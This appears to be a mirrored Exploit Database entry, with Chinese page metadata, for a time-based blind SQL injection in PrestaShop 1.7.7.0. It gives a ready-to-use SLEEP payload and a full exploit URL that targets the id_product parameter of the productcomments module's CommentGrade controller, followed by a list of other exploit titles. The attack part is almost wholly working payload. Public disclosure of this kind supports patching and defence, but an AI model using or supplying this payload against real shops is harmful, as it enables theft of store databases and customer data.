Prestashop 1.7.7.0 – ‘id_product’ Time Based Blind SQL Injection

Exploit Database
123 阅读

作者： Jaimin Gondaliya

日期： 2021-01-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49410/

# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection

# Date: 08-01-2021

# Exploit Author: Jaimin Gondaliya

# Vendor Homepage: https://www.prestashop.com

# Software Link: https://www.prestashop.com/en/download

# Version: Prestashop CMS - 1.7.7.0

# Tested on: Windows 10

Parameter: id_product

Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

Exploit:

http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)

last Exploits
Prestashop 1.7.7.0 – ‘id_product’ Time Based Blind SQL Injection的更多信息

MyBB New Threads Plugin 1.1 – Cross-Site Scripting：
WedgeOS 4.0.4 – Multiple Vulnerabilities：
eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)：
Taha Portal 3.2 – ‘sitemap.php’ Cross-Site Scripting：
Getsimple CMS Items Manager Plugin – ‘PHP.php’ Arbitrary File Upload：
ContentKeeper Web – Remote Command Execution (Metasploit)：
Joomla! 1.6.0 Alpha2 – Cross-Site Scripting：
openSIS Student Information System 8.0 – ‘multiple’ SQL Injection：